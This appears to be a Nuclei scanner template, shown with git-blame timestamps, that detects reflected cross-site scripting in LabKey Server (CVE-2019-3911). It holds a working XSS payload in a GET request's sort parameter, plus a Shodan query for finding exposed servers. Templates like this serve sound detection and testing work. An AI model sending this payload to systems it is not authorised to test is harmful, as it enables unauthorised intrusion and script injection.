2022-02-14 20:56:46 +00:00
id : CVE-2019-3911
2022-09-10 01:55:52 +00:00
2022-02-14 20:56:46 +00:00
info :
2022-09-08 13:28:46 +00:00
name : LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
2022-02-14 20:56:46 +00:00
author : princechaddha
severity : medium
2022-09-08 13:28:46 +00:00
description : LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
2022-02-14 20:56:46 +00:00
reference :
- https://www.tenable.com/security/research/tra-2019-03
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
2022-02-16 19:54:58 +00:00
classification :
2022-12-06 04:18:34 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-02-16 19:54:58 +00:00
cve-id : CVE-2019-3911
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:labkey:labkey_server:*:*:*:*:*:*:*:*
epss-score : 0.00178
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-04-22 10:38:41 +00:00
shodan-query: 'Server : Labkey'
2022-08-27 04:41:18 +00:00
tags : cve,cve2019,xss,labkey,tenable
2022-09-10 01:55:52 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-14 20:56:46 +00:00
- method : GET
path :
- '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL'
2022-09-10 01:55:52 +00:00
2022-02-14 20:56:46 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- "</script><script>alert(document.domain)</script>"
2022-09-10 01:55:52 +00:00
2022-02-14 20:56:46 +00:00
- type : word
part : header
words :
- text/html
2022-09-10 01:55:52 +00:00
2022-02-14 20:56:46 +00:00
- type : status
status :
- 200